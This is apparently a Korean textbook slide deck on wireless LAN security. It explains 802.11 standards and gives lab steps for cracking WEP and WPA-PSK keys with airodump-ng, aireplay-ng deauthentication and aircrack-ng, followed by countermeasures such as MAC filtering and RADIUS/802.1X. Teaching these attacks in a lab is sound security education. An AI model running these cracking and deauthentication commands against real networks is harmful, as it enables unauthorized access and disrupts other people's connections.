무선 네트워크 보안과 취약점

Download Report

Transcript 무선 네트워크 보안과 취약점

무선 네트워크 보안과 취약점
IT CookBook, 정보 보안 개론과 실습 : 네트워크 해킹과 보안(개정
판)
Contents
 학습목표
 무선 네트워크를 이해한다.
 무선 네트워크에 해킹 공격을 실행할 수 있다.
 무선 랜에 대한 보안 대책을 이해한다.
 내용
 무선 네트워크에 대한 이해
 WEP
 WPA-PSK
 무선 랜 보안
2/29
무선 네트워크에 대한 이해
 무선 랜
 유선 랜에 비해 통신의 한계가 분명치 않으며, 방향성이 없어 클라이언트가 어느 거리,
어느 방향에서 접속하는지에 대한 정보를 얻을 수 없음
 보급 초기에는 무선 네트워크 붐이 일어 많은 회사가 사내 무선 랜을 설치했지만 무선
랜의 취약한 보안 때문에 사내 네트워크가 그대로 노출되어 무선 랜을 서둘러 다시 제거
하는 해프닝을 벌이기도 함
 컴퓨터 통신에서 무선 랜은 2.4GHz 통신망을 이용하며, 표준 규약으로 802.11 사용
 802.11에는 802.11b, 802.11a, 802.11g, 802.11n 등이 있음
 초기의 속도 11Mbps인 802.11b를 사용하는 무선 랜은 점차 사라지고, 54Mbps를 지원
하는 802.11g와100Mbps 이상을 지원하는 802.11n으로 발전
3/29
무선 네트워크에 대한 이해
 주요 무선 랜 프로토콜
4/29
무선 네트워크에 대한 이해
 IEEE 802.11
 IEEE 802는 컴퓨터 통신망의 표준화를 추진하고 있는 IEEE 802 위원회가 개발한, 일
련의 LAN 접속 방법 및 프로토콜 국제 표준 지칭
 11은 무선 랜 관련 표준 위원회. IEEE 802.11 위원회는 1990년 10월부터 무선 매체 접
근 제어 물리 계층 규격에 대한 표준화를OSI 참조 모델에 준하여 진행 중
 IEEE 802.11b
• 802.11 규격을 기반으로 더욱 발전시킨 기술
• 최고 전송 속도는 11Mbps지만, 실제로는 CSMA/CA 기술의 구현 과정에서 6~7Mbps 정도 효율
을 나타내는 것으로 알려져 있음
 IEEE 802.11a
• 5GHz 대역의 전파를 사용하는 규격
• OFDM 기술을 사용해 전송 속도를 최고 54Mbps까지 지원
• 5GHz는 2.4GHz 대역에 비해 다른 통신기기(무선 전화기, 블루투스 기기 등)와의 간섭이 적고, 더
넓은 전파 대역을 사용할 수 있다는 장점이 있지만 신호의 특성상 장애물이나 도심 건물 등 주변
환경의 영향을 쉽게 받고, 2.4GHz 대역에서 54Mbps 속도를 지원하는802.11g 규격이 등장하면서
현재는 널리 쓰이지 않음
 IEEE 802.11g
• 802.11a 규격과 전송 속도가 같고 2.4GHz 대역 전파를 사용한다는 점만 다름
• 널리 사용되는 802.11b 규격과 쉽게 호환되어 현재 널리 쓰임
5/29
무선 네트워크에 대한 이해
 IEEE 802.11n
• 상용화된 전송 규격으로 2.4GHz 대역과 5GHz 대역을 사용하며 최고 300Mbps까지 속도 지원
• 우리나라의 경우 기술 규격 내 주파수 점유 대역폭의 문제(2개의 채널 점유)로 135~144Mbps로
속도가 제한되었으나, 2007년 10월 17일 전파 연구소의 기술기준고시로 300Mbps까지 사용할 수
있게 됨
 무선 랜의 이용과 통신 범위
 무선 랜은 ‘Ethernet Like’개념으로, 보통 내부 네트워크의 확장으로 이용
 무선 랜을 사용하려면 내부의 유선 네트워크에AP(Access Point) 장비를 설치해야 함
6/29
무선 네트워크에 대한 이해
 무선 랜의 전송 가능 거리
[그림 12-2] 무지향성 안테나 [그림 12-3] 지향성 안테나
 무지향성 안테나는 보통 봉 형태로 전파 수신에 일정한 방향성이 없어 AP의 위치에
상관없이 동작. 보통 4개 이상의 방향성이 있다고 말하는 것이 더 정확
 지향성은 다시 수직과 수평면에 대한 것으로 나뉘고, 대부분의 무지향성 안테나는
수평면에 대한 무지향성만 지원
7/29
무선 네트워크에 대한 이해
 무선 랜 접속
 윈도우
• 기본 제공 [무선 네트워크 연결]에서 사용 가능한 무선 랜 확인하여 접속을 원하는 무선 랜 선택
• NetStumbler(넷 스텀블러)를 사용해 무선 AP 검색 가능 : AP의 MAC 주소, SSID, 통신 채널
(channel), 신호 강도, 노이즈 등에 관한 정보를 얻을 수 있음
8/29
무선 네트워크에 대한 이해
 리눅스
• kismet(키스멧) 툴을 사용
 기타
• 구글맵과 함께 제공하는 Wigle(위글)과 같은 서비스 이용
9/29
실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기
[그림 12-7] Atheros 칩셋을 사용하는 무선 랜 카드 검색
실습환경
• 공격자 시스템 : 리눅스 페도라 12
• 공격 대상 시스템 : 리눅스 페도라 12
• 필요 프로그램 : madwifi-0.9.4.tar.gz (Atheros 칩셋 리눅스 드라이버)
10/29
실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기
1 무선 랜 카드 확인

iwconfig
11/29
실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기
2 필요 라이브러리 설치

2-1 kernel-devel 설치
➊ yum list kernel-devel* ➋ yum install kernel-devel.i686


2-2 kernel-headers 설치 ➊ yum list kernel-headers*➋ yum install kernel-headers.i686


12/29
실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기
3 기존 무선 랜 드라이버 제거

3-1 ath5k.ko, ath9k.ko, ath.ko로 확인된 Atheros 네트워크 모듈
➊ ifconfig wlan0 down
➋ modprobe -l *ath*
ifconfig wlan1 down

3-2 ath5k.ko, ath9k.ko, ath.ko 모듈 사용 금지 목록 등록
➊ echo "blacklist ath5k" >> /etc/modprobe.d/blacklist
➋ echo "blacklist ath9k" >> /etc/modprobe.d/blacklist
➌ echo "blacklist ath" >> /etc/modprobe.d/blacklist



13/29
실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기
4 무선 랜 해킹용 드라이버 설치

4-1 madwifi의 압축 풀어 설치
➊ tar xvf madwifi-0.9.4-current.tar.gz
➋ cd madwifi-0.9.4-current
➌ make
➍ make install
4-2 iwconfig 명령으로 무선 네트워크 인터페이스 확인
iwconfig
14/29
실습 12-1 무선 랜 해킹을 위한 네트워크 설정하기
4-3 스니핑용 가상 인터페이스 생성과 ath1 확인
➊ wlanconfig ath create wlandev wifi0 wlanmode monitor
➋ iwconfig


15/29
WEP
 WEP(Wired Equivalent Privacy)
 무선 랜 통신을 암호화하기 위해 802.11b 프로토콜부터 적용
 1987년에 만들어진 RC 4 암호화 알고리즘을 기본으로 사용
• 64/128비트 사용 가능. 64비트는 40비트, 128비트는 104비트 RC 4 키 사용
 WEP을 이용한 암호화 세션
• 암호화 과정에서 암호화키와
함께 24비트의 IV(Initial
Vector)를 사용. 통신 과정에
서 IV는 랜덤으로 생성되어,
암호화키에 대한 복호화를 어
렵지만 24비트의 IV는 통신 과
정에서 24비트의 짧은 길이로
인해 반복 사용되며, 반복 사
용이 WEP 키의 복호화를 쉽
게함
• 무선 통신에서 네트워크 패킷
에 포함된 IV를 충분히 수집하
여 WEP 키를 크랙할 경우1분
이내에도 복호화 가능
16/29
실습 12-2 WEP 키 크랙하기
실습환경
• 공격자 시스템 : 리눅스 페도라 12
• 공격 대상 시스템 : 윈도우 XP
• 필요 프로그램 : aircrack-ng
17/29
실습 12-2 WEP 키 크랙하기
1 실습 환경 구성

1-1 무선 랜 공유기에서 WEP 키 설정
1-2 클라이언트의 WEP 키 설정
18/29
실습 12-2 WEP 키 크랙하기
2 실습 환경 구성

➊ yum list aircrack* ➋ yum install aircrack-ng.i686


3 무선 랜 패킷 수집

airodump-ng --ivs --channel 1 -w wep ath1
•--ivs : 무선 랜 패킷 스니핑 시 암호화 크랙에
필요한 IV만 수집한다.
•--channel 1 : 통신 채널은 1만 스니핑한다.
•-w wep : WEP 키에 관한 내용을wep.ivs 파일
에 저장한다.
19/29
실습 12-2 WEP 키 크랙하기
4 WEP 키 크랙

4-1 aircrack-ng에서 대상 네트워크 선택

➊ aircrack-ng wep-01.ivs ➋ 3 선택

4-2 aircrack-ng에서 크랙된 WEP 키 확인
20/29
WPA-PSK
 WPA-PSK(Wi-Fi Protected Access Pre-Shared Key)
 802.11i 보안 표준 중 일부분으로 WEP 방식의 보안 문제점을 해결하기 위해 만들어짐
 WEP처럼 AP와 통신해야 할 클라이언트에 암호화키를 기본으로 등록해두고 있지만 암
호화키를 이용해128비트인 통신용 암호화키를 새로 생성하고, 이 암호화키를 10,000개
패킷마다 바꿈
 암호화 알고리즘으로 TKIP 또는 AES를 사용할 수 있으며, WEP보다 훨씬 더 강화된 암
호화 세션을 제공
 AP에 접속하는 사용자마다 같은 암호화키를 사용한다는 점이 보안상 미흡
21/29
실습 12-3 WPA-PSK 키 크랙하기
실습환경
• 공격자 시스템 : 리눅스 페도라 12
• 공격 대상 시스템 : 윈도우 XP
• 필요 프로그램 : aircrack-ng
22/29
실습 12-3 WPA-PSK 키 크랙하기
1 실습 환경 구성 : 무선 랜 공유기에서 WPA-PSK 키 설정

23/29
실습 12-3 WPA-PSK 키 크랙하기
2 WPA-PSK 인증 패킷 수집

2-1 airodump-ng를 이용한 패킷 스니핑
airodump-ng --channel 1 -w wpa-psk ath1
2-2 aireplay-ng를 이용한 세션 중단 공격
aireplay-ng -0 5 -c 00:21:5d:2d:9b:ce -e wishfree ath1
• -0 5 : 세션을 끊는 패킷(DeAuth)을 5 번
보낸다.
• -c 00:16:6F:35:B4:74 : 공격 대상으로
확인된 클라이언트의 MAC 주소다. 이 주소는
airodump 화면에서 확인할 수 있다.
• -e wishfree : 공격 대상AP의 SSID다.
24/29
실습 12-3 WPA-PSK 키 크랙하기
3 WPA-PSK 키 크랙

3-1 aircrack-ng에서 대상 네트워크 선택
aircrack-ng -w dic wpa-psk-01.cap
3-2 aircrack-ng에서 크랙된 WPA-PSK 키 확인
25/29
무선 랜 보안
 무선 네트워크의 문제점에 대한 대응책
 AP 보호를 위해서는 전파가 건물 내부로 한정되도록 전파 출력을 조정하고 창이나 외부
에 접한 벽이 아닌 건물 안쪽 중심부, 특히 쉽게 눈에 띄지 않는 곳에 설치
 AP 관리 계정의 패스워드를 반드시 재설정
 AP의DHCP를 정지
 AP의 접속 MAC 주소 필터링
 SSID(Service Set Identifier)와 WEP(Wired Equivalent Privacy)을 설정
 802.1X와 RADIUS 서버를 이용해 인증
• 무선 네트워크 공격은 AP를 찾는 것부터 시작
• 무선 AP를 찾으려면 무선 안테나를 구입하거나 제작하여 버스를 타고 브라우징 SSID는 AP에서
브로드캐스팅되며, 대부분의 AP가 자동 IP 주소 할당으로 작동
26/29
무선 랜 보안
 RADIUS와 802.1X를 이용한 무선 랜 인증
➊ 클라이언트는AP에 접속을 요청한다.
➋ AP는 무선 랜 네트워크에 클라이언트가 로그인할 때까지 접속을 차단한다.
➌ RADIUS 서버는 클라이언트에 인증 Challenge를 전송한다.
➍ 클라이언트는 Challenge에 대한 응답으로, ID와 패스워드에 대한 해시 값을 구해 RADIUS 서버에
전송한다.
➎ RADIUS 서버가 사용자 관리 데이터베이스 정보를 사용해 Challenge의 응답에 대한 해시 값을 구
하여 클라이언트의 해시 값과 비교한다.
27/29
무선 랜 보안
➏ RADIUS 서버가 클라이언트를 인증하면 이러한 과정을 역으로 수행하여 클라이언트가 RADIUS
서버를 인증한다. 클라이언트와 RADIUS의 상호 인증이 이루어진다.
➐ 클라이언트와 RADIUS 서버의 상호 인증이 성공적으로 완료되면, 네트워크 접근을 위한 적당한
클라이언트의 수준을 정의하고 클라이언트를 구별할 수 있는WEP 키를 각각 결정한다.
➑ RADIUS 서버는 세션키(Session-Key)라고 부르는 WEP 키를 유선 랜에 위치한 AP에 전송한다.
➒ AP는 세션키로 브로드캐스트 키를 암호화하여 클라이언트에 암호화된 키를 전송한다.
➓ 클라이언트는 브로드캐스트된 암호화된 키를 복호화하기 위해 세션키를 사용한다.
클라이언트와 AP는 WEP을 활성화하며, 세션이 성립되어 있는 시간 동안 통신에 세션과 브로드
11 캐스트 키를 사용한다.
28/29
IT CookBook, 정보 보안 개론과 실습 : 네트워크 해킹과 보안(개정
판)